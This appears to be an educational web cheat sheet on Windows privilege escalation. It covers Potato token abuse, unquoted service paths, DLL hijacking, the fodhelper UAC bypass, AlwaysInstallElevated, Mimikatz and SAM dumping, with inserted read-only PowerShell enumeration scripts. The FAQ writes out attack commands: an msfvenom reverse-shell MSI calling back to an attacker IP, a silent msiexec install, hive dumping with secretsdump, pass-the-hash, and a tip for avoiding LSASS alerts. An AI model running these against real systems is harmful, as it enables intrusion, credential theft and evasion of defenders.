liminfo

Windows Privilege Escalation

Free reference guide: Windows Privilege Escalation

About Windows Privilege Escalation

The Windows Privilege Escalation Reference is a categorized cheat sheet of post-exploitation techniques for escalating privileges from a low-privileged user to SYSTEM or Administrator on Windows systems. It covers six attack categories: token manipulation (SeImpersonatePrivilege abuse with JuicyPotato, PrintSpoofer, GodPotato), Windows service misconfigurations (unquoted paths, weak permissions, binary replacement), registry-based attacks (AlwaysInstallElevated, autorun, stored credentials, service registry keys), DLL hijacking (search order abuse, phantom DLL, DLL proxying), UAC bypass methods (fodhelper.exe, eventvwr.exe, sdclt.exe), and credential harvesting (cmdkey, Mimikatz, SAM/SYSTEM dump, WiFi passwords).

Each entry provides the exact command-line syntax or PowerShell one-liner needed to check for the vulnerability and exploit it, along with tool names (JuicyPotato, PrintSpoofer, GodPotato, Mimikatz, accesschk, procmon, impacket-secretsdump) and specific flags. The reference is designed for penetration testers, red team operators, CTF participants, and security students preparing for OSCP/CRTO/eCPPT certifications who need a fast lookup during engagements.

The content is organized as a searchable RefTool with bash syntax highlighting and bilingual Korean/English support. All information is presented in the browser with no server-side processing. This is an educational reference for authorized security testing only.

Key Features

  • Token exploitation techniques: JuicyPotato, PrintSpoofer, GodPotato, and token duplication for SYSTEM access
  • Service misconfiguration attacks: unquoted service path, weak service permissions (accesschk), binary replacement
  • Registry-based escalation: AlwaysInstallElevated MSI abuse, autorun hijacking, stored credential search
  • DLL hijacking methods: DLL search order abuse, phantom DLL loading, DLL proxying with function forwarding
  • UAC bypass via auto-elevating binaries: fodhelper.exe, eventvwr.exe, sdclt.exe registry key manipulation
  • Credential harvesting: cmdkey /list, Mimikatz sekurlsa::logonpasswords, SAM/SYSTEM dump with impacket
  • WiFi password extraction and file-based credential search across user directories
  • Searchable, filterable interface with bash/PowerShell syntax highlighting and bilingual Korean/English content

Frequently Asked Questions

What is SeImpersonatePrivilege and why is it important?

SeImpersonatePrivilege ("Impersonate a client after authentication") lets a process adopt the security context of a client that has authenticated to it, for example over a named pipe or an RPC call. Windows grants it by default to service identities such as IIS application pool accounts, the MSSQL service account and the built-in LOCAL SERVICE and NETWORK SERVICE accounts, so code execution from a web shell or xp_cmdshell in one of those contexts is usually a single step from SYSTEM. The Potato family (JuicyPotato, RoguePotato, PrintSpoofer, GodPotato) exploits it by coercing a SYSTEM-owned component (DCOM activation, or the Print Spooler connecting back to an attacker-controlled named pipe) into authenticating to an endpoint the attacker owns, then impersonating the captured SYSTEM token to spawn a process. Check with whoami /priv; the privilege counts even if its State column shows Disabled, because the tools enable it on their own token. Caveat: JuicyPotato stopped working on Windows 10 1809 / Server 2019 and later, where the DCOM path it relied on was closed; there PrintSpoofer (requires the Print Spooler service to be running) or GodPotato is used instead. SeAssignPrimaryTokenPrivilege is abused the same way.
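The check above comes down to three facts about the target: which token privileges are present, which OS build is running, and whether the Print Spooler is up. The following PowerShell function is an added example, not part of the reference itself; it collects those facts read-only and names the tool family that fits. It assumes a Windows host where whoami and the registry are available, and the function name Get-PotatoTriage is my own.

```powershell
# Added example (not part of the original reference): read-only triage of which
# Potato-family tool applies to the current token and OS build.
function Get-PotatoTriage {
    # whoami /priv lists every privilege in the token, Enabled or Disabled alike;
    # a Disabled SeImpersonatePrivilege is still usable because the tools enable it.
    $privs = whoami /priv /fo csv | ConvertFrom-Csv
    $names = $privs.'Privilege Name'
    $hasImpersonate = $names -contains 'SeImpersonatePrivilege'
    $hasAssign      = $names -contains 'SeAssignPrimaryTokenPrivilege'

    # Build number decides the JuicyPotato cutoff: 17763 = Windows 10 1809 / Server 2019.
    $build = [int](Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion').CurrentBuild

    # PrintSpoofer coerces the spooler service, so it must actually be running.
    $spooler = Get-Service -Name Spooler -ErrorAction SilentlyContinue
    $spoolerRunning = [bool]($spooler -and $spooler.Status -eq 'Running')

    $tools = @()
    if ($hasImpersonate -or $hasAssign) {
        if ($build -lt 17763) { $tools += 'JuicyPotato (DCOM activation, pre-1809 builds only)' }
        if ($spoolerRunning)  { $tools += 'PrintSpoofer (needs Print Spooler running)' }
        $tools += 'GodPotato / RoguePotato (work on 1809+ and Server 2019+)'
    }

    [pscustomobject]@{
        Build                         = $build
        SeImpersonatePrivilege        = $hasImpersonate
        SeAssignPrimaryTokenPrivilege = $hasAssign
        SpoolerRunning                = $spoolerRunning
        Candidates                    = $tools
    }
}

Get-PotatoTriage
```

An empty Candidates list means the token has neither privilege and the Potato route is closed; look at the other categories on this page instead.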

How does an unquoted service path attack work?

When a service's binary path contains spaces and is not wrapped in quotation marks (e.g. C:\Program Files\My App\service.exe), the Service Control Manager cannot tell where the executable name ends and its arguments begin, so CreateProcess tries each space-delimited prefix in turn: C:\Program.exe, then C:\Program Files\My.exe, and only then C:\Program Files\My App\service.exe. If one of those intermediate directories (here C:\ or C:\Program Files) is writable, a binary placed under the intermediate name runs with the service's account the next time the service starts. Three conditions must all hold for this to be an escalation: the path is unquoted and contains a space, the current user can write to one of the intermediate directories (check with icacls or accesschk.exe -uwdq), and the service runs as a privileged account (usually LocalSystem) and can be restarted, or is set to start automatically so a reboot triggers it. A quick enumeration from cmd: wmic service get name,pathname,startmode | findstr /i /v "C:\Windows\\" | findstr /i /v """ lists non-Windows services whose path contains no quote character.
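The path-splitting rule described above is mechanical, so it can be enumerated rather than eyeballed. The PowerShell below is an added example (not the reference's own content): it walks every service, rebuilds the intermediate paths Windows will probe for each unquoted path, and reports which of those directories the current user can write to. The function names are mine, and the writability probe creates and immediately deletes a zero-byte file, which is the only write it performs.

```powershell
# Added example (not part of the original reference): find unquoted service
# paths and the writable directories that make them exploitable.

function Test-DirectoryWritable {
    param([string]$Directory)
    if (-not (Test-Path -LiteralPath $Directory -PathType Container)) { return $false }
    # Probe with a random zero-byte file; ACL parsing is error-prone, a real write is not.
    $probe = Join-Path $Directory ([System.IO.Path]::GetRandomFileName())
    try {
        [System.IO.File]::Create($probe).Dispose()
        Remove-Item -LiteralPath $probe -Force
        return $true
    } catch {
        return $false
    }
}

function Get-UnquotedServicePath {
    foreach ($svc in Get-CimInstance Win32_Service) {
        $path = $svc.PathName
        if (-not $path) { continue }
        if ($path.StartsWith('"')) { continue }          # quoted: not vulnerable

        # The binary ends at the first ".exe"; whatever follows are arguments.
        $m = [regex]::Match($path, '^(.*?\.exe)', 'IgnoreCase')
        if (-not $m.Success) { continue }
        $exe = $m.Groups[1].Value
        if ($exe -notmatch ' ') { continue }              # no space: nothing to hijack
        if ($exe -like 'C:\Windows\*') { continue }       # Windows dirs are not writable by low-priv users

        # Windows tries each space-delimited prefix + ".exe" before the real binary:
        #   C:\Program Files\My App\service.exe -> C:\Program.exe, C:\Program Files\My.exe
        $parts = $exe -split ' '
        for ($i = 1; $i -lt $parts.Count; $i++) {
            $candidate = ($parts[0..($i - 1)] -join ' ') + '.exe'
            $dir = Split-Path -Parent $candidate
            [pscustomobject]@{
                Service   = $svc.Name
                RunsAs    = $svc.StartName
                StartMode = $svc.StartMode
                ImagePath = $exe
                Hijack    = $candidate
                Writable  = Test-DirectoryWritable $dir
            }
        }
    }
}

# Only the rows where the current user can actually drop the binary matter.
Get-UnquotedServicePath | Where-Object Writable | Format-Table -AutoSize
```

Filter the result further on RunsAs (LocalSystem or another privileged account) and on whether you can restart the service (sc stop/start needs the SERVICE_STOP/START rights, which accesschk.exe -ucqv shows) or wait for a reboot.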

What is DLL hijacking and how is it detected?

DLL hijacking abuses the Windows DLL search order. When a process loads a library by name alone, the loader (with SafeDllSearchMode enabled, the default) looks in the application's own directory, then System32, the 16-bit System directory, the Windows directory, the current working directory and finally each directory on PATH, and takes the first match. Process Monitor makes the gaps visible: filter on Operation is CreateFile, Result is NAME NOT FOUND and Path ends with .dll, and every hit is a library the process asked for that did not exist at that location. Placing a DLL with that name in a writable directory earlier in the search order gets it loaded and its DllMain executed inside the process. Two caveats decide whether this is an escalation rather than code execution as yourself: the loading process must run with higher privileges than you (a service, a scheduled task, or an auto-elevated binary), and the DLL must not be on the KnownDLLs list (HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs), whose entries are mapped from the \KnownDlls object directory and never resolved through the search order. The "phantom DLL" variant targets names that are missing from every location; "DLL proxying" keeps the application working by forwarding the legitimate exports to the real DLL while the malicious code runs alongside.
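Procmon captures run to millions of rows, so the filtering described above is best done on an exported CSV. The PowerShell below is an added example and not part of the reference; it parses the default procmon CSV layout, keeps only missing-DLL loads, drops KnownDLLs and anything under the Windows directory (not writable by a low-privileged user), and lists the remaining candidates per process. The CSV text embedded in it is a constructed sample, not a real capture, and the function name is my own.

```powershell
# Added example (not part of the original reference): triage a Process Monitor
# CSV export for DLL search-order hijacking candidates.

# Constructed sample in procmon's default export layout (not a real capture).
$procmonCsv = @'
"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"10:01:02.0000000","VendorSvc.exe","1234","CreateFile","C:\Program Files\Vendor\App\ntdll.dll","NAME NOT FOUND","Desired Access: Read"
"10:01:02.0000001","VendorSvc.exe","1234","CreateFile","C:\Program Files\Vendor\App\telemetry.dll","NAME NOT FOUND","Desired Access: Read"
"10:01:02.0000002","VendorSvc.exe","1234","CreateFile","C:\Windows\System32\telemetry.dll","NAME NOT FOUND","Desired Access: Read"
"10:01:02.0000003","VendorSvc.exe","1234","CreateFile","C:\Program Files\Vendor\App\config.ini","NAME NOT FOUND","Desired Access: Read"
"10:01:03.0000000","notepad.exe","4321","CreateFile","C:\Users\low\Desktop\plugin.dll","NAME NOT FOUND","Desired Access: Read"
'@

function Get-DllHijackCandidate {
    param([string]$Csv)

    # KnownDLLs are mapped from \KnownDlls and never go through the search order.
    # ntdll/kernel32/kernelbase are implicit members and not listed under the key,
    # so they are always included here; the registry list extends it when readable.
    $knownDlls = @('ntdll.dll', 'kernel32.dll', 'kernelbase.dll')
    $kd = Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs' -ErrorAction SilentlyContinue
    if ($kd) {
        $knownDlls += $kd.PSObject.Properties |
            Where-Object { $_.Name -notlike 'PS*' -and $_.Name -notin 'DllDirectory', 'DllDirectory32' } |
            ForEach-Object { $_.Value.ToLower() }
    }

    $Csv | ConvertFrom-Csv |
        Where-Object { $_.Operation -eq 'CreateFile' -and $_.Result -eq 'NAME NOT FOUND' -and $_.Path -like '*.dll' } |
        ForEach-Object {
            $name = [System.IO.Path]::GetFileName($_.Path).ToLower()
            $dir  = Split-Path -Parent $_.Path
            [pscustomobject]@{
                Process   = $_.'Process Name'
                PID       = $_.PID
                Dll       = $name
                Directory = $dir
                KnownDll  = ($knownDlls -contains $name)
                SystemDir = ($dir -like "$env:SystemRoot\*")   # System32 etc.: not writable by low-priv users
            }
        } |
        Where-Object { -not $_.KnownDll -and -not $_.SystemDir } |
        Sort-Object Process, Dll, Directory -Unique
}

Get-DllHijackCandidate -Csv $procmonCsv | Format-Table -AutoSize
```

On the sample this leaves telemetry.dll for VendorSvc.exe and plugin.dll for notepad.exe. Only the first is interesting: notepad runs as the user who started it, so hijacking it gains nothing, whereas a service binary missing a DLL from its own directory is worth checking for write access (icacls "C:\Program Files\Vendor\App"). Add procmon's User and Integrity columns to the export to make that triage automatic.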

How does the fodhelper.exe UAC bypass work?

fodhelper.exe (the Features on Demand helper in C:\Windows\System32) is a Microsoft-signed binary whose manifest sets autoElevate to true, so when an administrator's medium-integrity process launches it, UAC elevates it without a prompt. It opens the ms-settings: protocol handler, which the shell resolves through the per-user class hive first: HKCU\Software\Classes\ms-settings\Shell\Open\command. Because HKCU is writable by the user, an attacker creates that key, sets its (Default) value to the payload command (cmd.exe or any binary) and adds an empty string value named DelegateExecute, which makes the shell run the command instead of dispatching to a COM handler; launching fodhelper.exe then executes the payload with a high-integrity token and no consent dialog. Caveats: this is a UAC bypass, not a privilege escalation. It works only when the current user is already a member of the local Administrators group (running under the filtered token UAC creates at logon) and UAC is set below "Always notify" (ConsentPromptBehaviorAdmin not 1 or 2); from a standard user account it yields nothing. The HKCU key is a well-known indicator that Microsoft Defender flags, so remove it after use.
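Whether the technique above can work at all, and whether someone has already used it, are both answerable from registry and token state without touching fodhelper.exe. The PowerShell below is an added example and not part of the reference; it reports the UAC policy values, whether the session holds a filtered administrator token, and whether the hijack key exists and what it points to. The function name is mine and the code only reads.

```powershell
# Added example (not part of the original reference): read-only check of UAC
# posture plus the registry footprint a fodhelper-style bypass leaves behind.
function Get-UacBypassPosture {
    $pol = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'

    # IsInRole(Administrator) is true only when the running token is already high integrity.
    $id = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    $pr = New-Object System.Security.Principal.WindowsPrincipal($id)
    $elevated = $pr.IsInRole([System.Security.Principal.WindowsBuiltInRole]::Administrator)

    # On a filtered token whoami still lists Administrators (S-1-5-32-544), marked "deny only";
    # .NET's WindowsIdentity.Groups hides such deny-only entries, hence the shell-out.
    $adminRow = whoami /groups /fo csv | ConvertFrom-Csv | Where-Object SID -eq 'S-1-5-32-544'
    $adminMember   = [bool]$adminRow
    $filteredToken = $adminMember -and -not $elevated

    # Auto-elevation is honoured at ConsentPromptBehaviorAdmin 3, 4 and 5 (5 is the default).
    # 1 and 2 ("Always notify") prompt for everything; 0 never prompts, so no bypass is needed.
    $cpba = $pol.ConsentPromptBehaviorAdmin

    $hijackKey = 'HKCU:\Software\Classes\ms-settings\Shell\Open\command'
    $hijack    = Get-ItemProperty -Path $hijackKey -ErrorAction SilentlyContinue
    $command   = if ($hijack) { $hijack.'(default)' } else { $null }
    $delegate  = [bool]($hijack -and $hijack.PSObject.Properties['DelegateExecute'])

    [pscustomobject]@{
        EnableLUA                  = $pol.EnableLUA
        ConsentPromptBehaviorAdmin = $cpba
        AdminGroupMember           = $adminMember
        FilteredToken              = $filteredToken
        BypassApplicable           = ($pol.EnableLUA -eq 1 -and $filteredToken -and $cpba -in 3, 4, 5)
        HijackKeyPresent           = [bool]$hijack
        HijackCommand              = $command
        DelegateExecuteSet         = $delegate
    }
}

Get-UacBypassPosture
```

HijackKeyPresent is also a cheap detection: a legitimate user profile has no ms-settings handler under HKCU\Software\Classes, so its presence (especially with DelegateExecute set) indicates a bypass attempt. Deleting the key (Remove-Item -Recurse HKCU:\Software\Classes\ms-settings) is the cleanup step after an authorized test.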

What is AlwaysInstallElevated and how is it exploited?

AlwaysInstallElevated is the Windows Installer Group Policy setting "Always install with elevated privileges": when active, msiexec performs every package installation as NT AUTHORITY\SYSTEM instead of as the invoking user. It takes effect only when both of these DWORD values are 1: HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated and HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated. If either is missing or 0, the policy is off and an MSI installs with the user's own rights, so check both with reg query before bothering to build a payload. When both are set, the attacker generates an MSI wrapping a payload (e.g. msfvenom -p windows/x64/shell_reverse_tcp LHOST=<attacker-ip> LPORT=<port> -f msi -o evil.msi) and installs it silently with msiexec /quiet /qn /i evil.msi; the payload runs as SYSTEM because the Windows Installer service executes the install.
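The two-value check above is one instance of a broader registry review; the same reasoning applies to the service registry keys listed in this reference, where a key ACL granting the current user SetValue lets ImagePath be repointed at a payload. The PowerShell below is an added example (not the reference's own content) that does both: it reports the AlwaysInstallElevated state across HKLM and HKCU, then lists services whose registry key grants a write right to a SID the current token carries. Both function names are mine, deny ACEs are not evaluated (so treat hits as candidates to confirm), and nothing is modified.

```powershell
# Added example (not part of the original reference): registry-based checks
# for AlwaysInstallElevated and for writable service keys. Read-only.

function Test-AlwaysInstallElevated {
    $sub  = 'SOFTWARE\Policies\Microsoft\Windows\Installer'
    $hklm = (Get-ItemProperty "HKLM:\$sub" -Name AlwaysInstallElevated -ErrorAction SilentlyContinue).AlwaysInstallElevated
    $hkcu = (Get-ItemProperty "HKCU:\$sub" -Name AlwaysInstallElevated -ErrorAction SilentlyContinue).AlwaysInstallElevated
    [pscustomobject]@{
        HKLM        = $hklm
        HKCU        = $hkcu
        Exploitable = ($hklm -eq 1 -and $hkcu -eq 1)   # the policy is only active with both set to 1
    }
}

function Get-WritableServiceKey {
    # Every SID the current token carries: the user plus all enabled groups.
    $id     = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    $mySids = @($id.User.Value) + @($id.Groups | ForEach-Object { $_.Value })

    # Any of these lets the holder replace ImagePath (or the whole key).
    $writeRights = [System.Security.AccessControl.RegistryRights]'SetValue, WriteKey, FullControl'

    Get-ChildItem 'HKLM:\SYSTEM\CurrentControlSet\Services' -ErrorAction SilentlyContinue | ForEach-Object {
        $key = $_
        $acl = Get-Acl -Path $key.PSPath -ErrorAction SilentlyContinue
        if (-not $acl) { return }                        # key not readable by us: skip
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            if (($ace.RegistryRights -band $writeRights) -eq 0) { continue }
            $sid = try { $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value } catch { $null }
            if ($sid -and $mySids -contains $sid) {
                [pscustomobject]@{
                    Service   = $key.PSChildName
                    Identity  = $ace.IdentityReference.Value
                    Rights    = $ace.RegistryRights
                    ImagePath = (Get-ItemProperty $key.PSPath -Name ImagePath -ErrorAction SilentlyContinue).ImagePath
                }
                break                                    # one matching ACE per service is enough
            }
        }
    }
}

Test-AlwaysInstallElevated
Get-WritableServiceKey | Format-Table -AutoSize
```

For a service key hit, the exploitation path is the one the reference lists under service registry keys: reg add to set ImagePath to the payload and restart the service (or wait for a reboot if the service runs as LocalSystem with automatic start). Record the original ImagePath first so it can be restored.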

How do I extract credentials using Mimikatz?

Run Mimikatz from an elevated context: privilege::debug enables SeDebugPrivilege, then sekurlsa::logonpasswords reads the credential material of every logon session out of LSASS memory. What comes back depends on the host. NTLM hashes and Kerberos tickets are present on any system, but plaintext passwords appear only where the WDigest provider still caches them, i.e. UseLogonCredential = 1 under HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest; that is the default only on Windows 7 / Server 2008 R2 and earlier (Windows 8.1 / Server 2012 R2, and KB2871997 on older versions, turned it off). Other modules: lsadump::sam for local account hashes from the SAM (pair it with token::elevate to read as SYSTEM), lsadump::secrets for LSA secrets such as service account passwords, and vault::cred for Credential Manager entries. Mimikatz needs local Administrator rights (to obtain SeDebugPrivilege) and cannot open LSASS when it runs as a protected process (RunAsPPL = 1) or when Credential Guard isolates the secrets in a virtualization-based container; in those configurations sekurlsa returns nothing useful.
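Because the outcome above is governed by three host settings, it can be predicted before dropping Mimikatz onto a monitored machine. The PowerShell below is an added example and not part of the reference; it reads the WDigest caching flag, the LSASS protected-process flag and the Credential Guard status, and states what sekurlsa::logonpasswords is likely to return. The function name is mine, the code only reads, and it runs as a low-privileged user.

```powershell
# Added example (not part of the original reference): read-only check of the
# controls that decide what sekurlsa::logonpasswords can extract.
function Get-LsassCredentialPosture {
    # WDigest caching: 1 = plaintext kept in LSASS. When the value is absent, the
    # default is "off" from Windows 8.1 / Server 2012 R2 (build 9600) onward and
    # "on" before that (even with KB2871997 installed, which only adds the switch).
    $wdigest = (Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest' `
                -Name UseLogonCredential -ErrorAction SilentlyContinue).UseLogonCredential
    $build   = [int](Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion').CurrentBuild
    $plaintextLikely = ($wdigest -eq 1) -or (($null -eq $wdigest) -and ($build -lt 9600))

    # RunAsPPL 1 (or 2 on Windows 11) makes LSASS a protected process; a user-mode
    # OpenProcess with PROCESS_VM_READ fails even with SeDebugPrivilege.
    $lsa = Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa' -ErrorAction SilentlyContinue

    # Credential Guard: Win32_DeviceGuard.SecurityServicesRunning contains 1 when active.
    $dg = Get-CimInstance -Namespace 'root\Microsoft\Windows\DeviceGuard' -ClassName Win32_DeviceGuard -ErrorAction SilentlyContinue
    $credGuard = [bool]($dg -and ($dg.SecurityServicesRunning -contains 1))

    [pscustomobject]@{
        Build                     = $build
        WDigestUseLogonCredential = $wdigest
        PlaintextLikely           = $plaintextLikely
        RunAsPPL                  = $lsa.RunAsPPL
        CredentialGuardRunning    = $credGuard
        SekurlsaExpectedToWork    = (-not $lsa.RunAsPPL) -and (-not $credGuard)
        ExpectedMaterial          = if ($credGuard) { 'nothing usable' }
                                    elseif ($plaintextLikely) { 'NTLM hashes, Kerberos tickets, plaintext' }
                                    else { 'NTLM hashes, Kerberos tickets' }
    }
}

Get-LsassCredentialPosture
```

When RunAsPPL is set, the page's other credential sources (SAM/SYSTEM hive export, cmdkey, stored credentials in files) remain available and are far less likely to trigger an LSASS-access alert.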

How do I dump and crack the SAM database?

Export the hives with reg save HKLM\SAM C:\temp\SAM and reg save HKLM\SYSTEM C:\temp\SYSTEM (Administrator required; the live hive files under C:\Windows\System32\config are locked while Windows runs, which is why reg save or a Volume Shadow Copy is used instead of a plain copy). Add reg save HKLM\SECURITY C:\temp\SECURITY to also capture LSA secrets and cached domain credentials. On the attack machine run impacket-secretsdump -sam SAM -system SYSTEM -security SECURITY LOCAL: the SYSTEM hive holds the boot key which, combined with the SAM's own key material, decrypts the per-account NT hashes. Output lines have the form user:RID:LM-hash:NT-hash:::; crack the NT hash with hashcat -m 1000 or john --format=NT, or skip cracking and pass the hash with impacket-psexec or evil-winrm against other hosts that share the same local administrator password.

Is this reference intended for authorized testing only?

Yes. All techniques documented in this reference are intended exclusively for authorized penetration testing, red team engagements, CTF competitions, and security education. Unauthorized use of these techniques against systems you do not own or have written permission to test is illegal and unethical. Always obtain proper authorization before performing any security testing.